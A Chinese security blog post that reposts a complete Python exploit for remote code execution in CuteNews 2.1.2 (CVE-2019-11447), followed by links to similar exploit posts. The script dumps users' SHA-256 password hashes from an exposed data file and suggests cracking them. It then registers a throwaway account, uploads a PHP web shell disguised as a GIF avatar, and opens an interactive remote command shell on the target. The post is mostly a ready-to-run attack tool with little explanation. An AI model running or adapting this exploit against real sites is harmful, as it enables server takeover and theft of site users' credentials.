CuteNews 2.1.2-远程执行代码—Hack之路

2020年9月14日 pm4:49 • web漏洞库更新

CuteNews 2.1.2-远程执行代码

＃Google Dork：不适用

＃日期：2020-09-10

＃漏洞作者：Musyoka Ian

＃供应商主页：https://cutephp.com/cutenews/downloading.php

＃软件链接：https://cutephp.com/cutenews/downloading.php

＃版本：CuteNews 2.1.2

＃测试于：Ubuntu 20.04，CuteNews 2.1.2

＃CVE：CVE-2019-11447# CVE : CVE-2019-11447

#! /bin/env python3

import requests

from base64 import b64decode

import io

import re

import string

import random

import sys

banner = """

———————————————————————————–

"""

print (banner)

print ("[->] Usage python3 expoit.py")

print ()

sess = requests.session()

payload = "GIF8;\n<?php system($_REQUEST['cmd']) ?>"

ip = input("Enter the URL> ")

def extract_credentials():

    global sess, ip

    url = f"{ip}/CuteNews/cdata/users/lines"

    encoded_creds = sess.get(url).text

    buff = io.StringIO(encoded_creds)

    chash = buff.readlines()

    if "Not Found" in encoded_creds:

            print ("[-] No hashes were found skipping!!!")

            return

    else:

        for line in chash:

            if "<?php die('Direct call - access denied'); ?>" not in line:

                credentials = b64decode(line)

                try:

                    sha_hash = re.search('"pass";s:64:"(.*?)"', credentials.decode()).group(1)

                    print (sha_hash)

                except:

                    pass

def register():

    global sess, ip

    userpass = "".join(random.SystemRandom().choice(string.ascii_letters + string.digits ) for _ in range(10))

    postdata = {

        "action" : "register",

        "regusername" : userpass,

        "regnickname" : userpass,

        "regpassword" : userpass,

        "confirm" : userpass,

        "regemail" : f"{userpass}@hack.me"

    }

    register = sess.post(f"{ip}/CuteNews/index.php?register", data = postdata, allow_redirects = False)

    if 302 == register.status_code:

        print (f"[+] Registration successful with username: {userpass} and password: {userpass}")

    else:

        sys.exit()

def send_payload(payload):

    global ip

    token = sess.get(f"{ip}/CuteNews/index.php?mod=main&opt=personal").text

    signature_key = re.search('signature_key" value="(.*?)"', token).group(1)

    signature_dsi = re.search('signature_dsi" value="(.*?)"', token).group(1)

    logged_user = re.search('disabled="disabled" value="(.*?)"', token).group(1)

    print (f"signature_key: {signature_key}")

    print (f"signature_dsi: {signature_dsi}")

    print (f"logged in user: {logged_user}")

    files = {

        "mod" : (None, "main"),

        "opt" : (None, "personal"),

        "__signature_key" : (None, f"{signature_key}"),

        "__signature_dsi" : (None, f"{signature_dsi}"),

        "editpassword" : (None, ""),

        "confirmpassword" : (None, ""),

        "editnickname" : (None, logged_user),

        "avatar_file" : (f"{logged_user}.php", payload),

        "more[site]" : (None, ""),

        "more[about]" : (None, "")

    }

    payload_send = sess.post(f"{ip}/CuteNews/index.php", files = files).text

    print("============================\nDropping to a SHELL\n============================")

    while True:

        print ()

        command = input("command > ")

        postdata = {"cmd" : command}

        output = sess.post(f"{ip}/CuteNews/uploads/avatar_{logged_user}_{logged_user}.php", data=postdata)

        if 404 == output.status_code:

            print ("sorry i can't find your webshell try running the exploit again")

            sys.exit()

        else:

            output = re.sub("GIF8;", "", output.text)

            print (output.strip())

if __name__ == "__main__":

    print ("================================================================\nUsers SHA-256 HASHES TRY CRACKING THEM WITH HASHCAT OR JOHN\n================================================================")

    extract_credentials()

    print ("================================================================")

    print()

    print ("=============================\nRegistering a users\n=============================")

    register()

    print()

    print("=======================================================\nSending Payload\n=======================================================")

    send_payload(payload)

    print ()

网站地址：https://www.hackzl.cn；发布者：hack之路，转转请注明出处：https://www.hackzl.cn/index.php/2020/09/14/cutenews-2-1-2-%e8%bf%9c%e7%a8%8b%e6%89%a7%e8%a1%8c%e4%bb%a3%e7%a0%81-hack%e4%b9%8b%e8%b7%af/

赞 (0)

打赏

微信扫一扫

0 0

使用Namp扫描—Hack之路

上一篇 2020年9月13日 pm11:51

Red Lion N-Tron 702-W / 702M12-W 2.0.26 XSS / CSRF / Shell漏洞—Hack之路

下一篇 2020年9月14日 pm4:58

web漏洞库更新

关于谷歌hack数据库—Hack之路

谷歌hack数据库谷歌hack数据库主要被骇客用于，撒网，靠着手里握着的0day或已公布的漏洞，对于未修复漏洞的站点进行攻击，当然这是一个攻防关系，作为Hack的我们需要有很高的…

2020年9月10日
web漏洞库更新

MedDream PACS Server 6.8.3.751-远程代码执行

MedDream PACS Server 6.8.3.751-远程代码执行（已验证）#日期：2020-10-01#易受攻击的软件：https://www.softeta.com/p…

2020年10月8日
web漏洞库更新

SevOne网络管理系统5.7.2.22 SQL注入/命令注入漏洞

SevOne网络管理系统5.7.2.22 SQL注入/命令注入漏洞产品：SevOne网络管理系统（NMS）易受攻击版本：5.7.2.22 固定版本： CVE编号：影响：严重 …

2020年10月8日
web漏洞库更新

Platinum Mobile 1.0.4.850授权绕过漏洞—Hack之路

Platinum Mobile 1.0.4.850授权绕过漏洞产品：Platinum Mobile 易受攻击的版本：1.0.4.850 固定版本：1.0.4.851 CVE编号：…

2020年10月8日
web漏洞库更新

Tea LaTex 1.0-远程执行代码(未经身份验证)—Hack之路

Tea LaTex 1.0-远程执行代码（未经身份验证）＃利用漏洞作者：nepska ＃供应商主页：https://github.com/ammarfaizi2/latex.te…

2020年9月12日
web漏洞库更新

Daily Tracker System 1.0-身份验证绕过漏洞—Hack之路

Daily Tracker System 1.0-身份验证绕过漏洞＃Exploit作者：Adeeb Shah（@ hyd3sec）和Bobby Cooke（boku）＃CVE ID…

2020年9月14日

发表评论